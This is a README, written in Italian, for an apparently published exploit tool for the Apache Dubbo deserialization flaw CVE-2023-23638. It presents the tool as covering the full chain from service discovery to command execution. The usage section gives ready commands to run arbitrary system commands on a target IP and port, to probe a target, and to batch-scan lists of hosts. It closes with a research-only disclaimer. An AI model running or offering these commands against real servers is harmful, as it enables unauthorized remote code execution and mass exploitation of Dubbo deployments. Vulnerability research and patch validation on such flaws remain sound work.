
Apache Dubbo (CVE-2023-23638) pratica ingegneristica dello sfruttamento della vulnerabilità
Pratica ingegneristica dello sfruttamento della vulnerabilità Apache Dubbo (CVE-2023-23638), copre l'intero processo da discovery del servizio a exploit e response in Dubbo 3.x. Questo strumento è solo a scopo di ricerca e apprendimento. Benvenuti colleghi per discutere e fornire preziosi suggerimenti.
Questo strumento supporta lo sfruttamento completo di CVE-2023-23638 su Dubbo 3.x, coprendo dal discovery del servizio all'exploit e al response. Può essere utilizzato anche su Dubbo 2.x, ma è necessario specificare manualmente nome del servizio, nome del metodo, ecc. Ho scritto due articoli di analisi su questa vulnerabilità:
Questo strumento è solo per uso didattico e non tiene conto di molti problemi pratici, ad esempio:
Verranno effettuati ulteriori aggiornamenti
Questo progetto non verrà più aggiornato. Scansione e sfruttamento più completi di Dubbo verranno rilasciati in un altro progetto in futuro. Rimanete sintonizzati!
Ringrazio il collega y4tacker per aver condiviso l'idea di deserializzazione nativa di Fastjson.
Sfruttamento di un singolo URL
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
Rilevamento innocuo di un singolo URL
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
Rilevamento batch
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
Iniezione di bytecode

Esecuzione di comandi

Questo strumento è solo per la ricerca e lo studio delle vulnerabilità. Se desideri testare l'usabilità di questo strumento, configura un ambiente target da solo. Quando utilizzi questo strumento per il rilevamento, devi assicurarti che l'azione sia conforme alle leggi e ai regolamenti locali e di aver ottenuto le autorizzazioni necessarie. Non eseguire scansioni su target non autorizzati. Se durante l'uso di questo strumento commetti atti illegali, ne assumi la responsabilità; non ci assumiamo alcuna responsabilità legale o connessa.